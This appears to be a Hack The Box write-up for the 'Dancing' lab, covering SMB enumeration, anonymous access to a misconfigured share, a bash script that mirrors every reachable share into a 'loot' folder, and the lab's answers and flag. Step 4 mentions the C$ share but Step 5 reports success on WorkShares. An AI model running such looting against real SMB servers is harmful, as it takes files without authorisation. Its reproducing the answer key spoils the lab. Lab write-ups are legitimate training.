HacktheBox "machine" Dancing

Description

SMB (Server Message Block) is a network protocol used for sharing files, printers, and other resources between computers on the same network, most commonly on Windows systems. It runs directly over TCP port 445 and, in older implementations, over NetBIOS over TCP/IP (NBT) on port 139. SMB sits at the Application and Presentation layers of the OSI model and relies on lower-level protocols for transport. During network scanning these open ports are easy to detect, and once found they allow enumeration of the shared resources the host exposes.

Enumeration

I start, as always, by scanning the target once we are connected to the VPN. The following command makes nmap scan its default set of common TCP ports (not all 65535), run the default scripts against each open port, and report the service version it finds.

Analysis

Step:-1

The first command is an Nmap scan. Nmap is the standard tool for network discovery and security auditing.

  • sudo: This runs the command with elevated privileges. Nmap needs root for some scan types, such as the raw-packet SYN scan it uses by default when run as root and OS detection; version detection alone does not need it.
  • nmap: This is the command-line tool used for network scanning.
  • -sC: This option runs the default set of NSE scripts against each open port.
  • -sV: This option probes open ports to identify the service and its version.

sudo nmap -sC -sV 10.129.113.234        


Step:-2

smbclient, part of the Samba suite, is the Linux client we use to list and access SMB shares. Install it if it is not already present:

sudo apt-get install smbclient        

Step:-3

The smbclient -L command lists the shares a remote SMB server exposes. Here's how it works:

  • smbclient: A command-line tool used to access shared files and printers on an SMB server.
  • -L: The flag used to list all the available shares on the target machine or server.
  • When prompted for a password, pressing Enter submits a blank one; this is how we find shares that allow anonymous access.

smbclient -L 10.129.113.234        

Step:-4 Foothold

Connecting to the share we try first returns NT_STATUS_ACCESS_DENIED, telling us we do not have valid credentials for it. We move on to the C$ administrative share.

Step:-5

Success! The WorkShares share was poorly configured, allowing us to connect with a blank password. Our terminal prompt changes to smb: \>, showing that we are now interacting with the share through the SMB shell.

Step:-6

  • ls : listing the contents of the current directory within the share
  • cd : changing the current directory within the share
  • get : downloading a single file from the share to the local machine (get works on files, not directories; use recurse and mget to pull whole trees)
  • exit : exiting the smb shell
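The whole procedure above, from listing shares to pulling files out of the one that accepts a blank password, as an added example that is not part of the original post. The share listing embedded in the script is a constructed sample laid out the way smbclient -L prints it; ADMIN$ and IPC$ are assumed default shares, only C$ and WorkShares appear in the write-up. The parsing functions run offline; list_shares, scan_target and mirror_share are the real network calls and only run when the script is invoked with the argument run. The TARGET address is the one from this write-up and is an assumption for your own box.

```shell
#!/usr/bin/env bash
# Added example (not from the original post): enumerate SMB shares, pick the
# ones worth trying with a blank password, and mirror whatever we can reach.
set -u

# Assumed target; replace with the IP from your own scan.
TARGET="${TARGET:-10.129.113.234}"

# Constructed sample of `smbclient -L` output (Samba layout: a table, then the
# SMB1 workgroup-listing noise). ADMIN$ and IPC$ are assumed default shares.
SAMPLE_LISTING=$(cat <<'EOF'
    Sharename       Type      Comment
    ---------       ----      -------
    ADMIN$          Disk      Remote Admin
    C$              Disk      Default share
    IPC$            IPC       Remote IPC
    WorkShares      Disk      

Reconnecting with SMB1 for workgroup listing.
Unable to connect with SMB1 -- no workgroup available
EOF
)

# scan_target: the nmap scan from Step 1, limited to the SMB ports.
scan_target() {
    sudo nmap -sC -sV -p 139,445 "$1"
}

# list_shares: the real share listing with a null session (-N skips the
# password prompt, which is the same as pressing Enter for a blank one).
list_shares() {
    smbclient -L "$1" -N
}

# parse_shares: read smbclient -L output on stdin and print one Disk share
# name per line. Rows start after the dashed header and end at a blank line.
parse_shares() {
    awk '/^[ \t]*---/      { in_table = 1; next }
         in_table && NF == 0 { in_table = 0 }
         in_table && $2 == "Disk" { print $1 }'
}

# count_shares: every row in the table, Disk and IPC alike.
count_shares() {
    awk '/^[ \t]*---/ { t = 1; next }
         t && NF == 0  { t = 0 }
         t && NF >= 2  { n++ }
         END           { print n + 0 }'
}

# non_admin_shares: drop the Windows administrative shares (names ending in $),
# which need real credentials; the rest are the ones to try anonymously first.
non_admin_shares() {
    grep -v '\$$' || true
}

# candidate_shares: Disk shares that are not administrative shares.
candidate_shares() {
    parse_shares | non_admin_shares
}

# mirror_share: connect with a blank password, pull every file recursively
# (prompt OFF stops mget asking per file), then show any flag file found.
mirror_share() {
    local host="$1" share="$2" out="loot/$2"
    mkdir -p "$out"
    smbclient "//$host/$share" -N -c "lcd $out; recurse ON; prompt OFF; mget *"
    find "$out" -iname 'flag*.txt' -exec sh -c 'echo "$1:"; cat "$1"' _ {} \;
}

if [ "${1:-}" = "run" ]; then
    # Live path: scan, list, and mirror every candidate share on the target.
    scan_target "$TARGET"
    list_shares "$TARGET" | candidate_shares | while read -r share; do
        mirror_share "$TARGET" "$share"
    done
else
    # Offline path: show which share the parser would try on the sample listing.
    printf '%s\n' "$SAMPLE_LISTING" | candidate_shares
fi
```

On the sample listing the script picks only WorkShares, because the three other shares are either administrative (ADMIN$, C$) or the IPC$ pipe share; count_shares reports 4, which is the answer to Task 5. The recursive mget is what the single get command in the shell does not give you: it pulls the whole directory tree in one command rather than one file at a time.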

Step:-7

Finally, the flag has been located in the share and downloaded.

Task 1

What does the 3-letter acronym SMB stand for?

Server Message Block

Task 2

What port does SMB use to operate at?

445

Task 3

What is the service name for port 445 that came up in our Nmap scan?

microsoft-ds

Task 4

What is the 'flag' or 'switch' that we can use with the smbclient utility to 'list' the available shares on Dancing?

-L

Task 5

How many shares are there on Dancing?

4

Task 6

What is the name of the share we are able to access in the end with a blank password?

WorkShares

Task 7

What is the command we can use within the SMB shell to download the files we find?

get

Submit Flag

Submit root flag

5f61c10dffbc77a704d76016a22f1664

Thanks for Visiting
